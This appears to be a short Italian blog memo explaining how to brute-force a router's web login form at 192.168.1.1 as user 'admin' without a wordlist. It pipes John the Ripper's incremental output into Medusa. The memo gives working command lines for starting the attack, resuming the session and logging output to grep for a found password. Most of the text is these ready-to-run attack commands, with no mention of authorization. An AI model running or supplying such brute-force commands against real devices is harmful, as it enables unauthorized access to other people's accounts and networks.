Veloce segnalazione per non dimenticarmi un metodo per effettuare un attacco brute force senza utilizzare un dizionario servendosi di John the Ripper e Medusa. Nell’esempio che segue il brute force è lanciato contro l’indirizzo 192.168.1.1, provando come username “admin” contro un form web (opzione di Medusa -M web-from):
#john --incremental=all --session=RouterBrute --stdout | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p
nel caso si doveste interrompere e successivamente riprendere il brute force questo è il comando:
#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p
Con i comandi dati in precedenza non si avrà un alert che interrompa il brute force e ci dica se la password è stata individuata per questo si può effettuare un pipe dell’output in un file e successivamente lanciare grep per cercare la stringa “FOUND” per individuare la password del nostro “bersaglio”
#john --restore=RouterBrute | xargs -L 1 medusa -h 192.168.1.1 -u admin -M web-form -p >> check.txt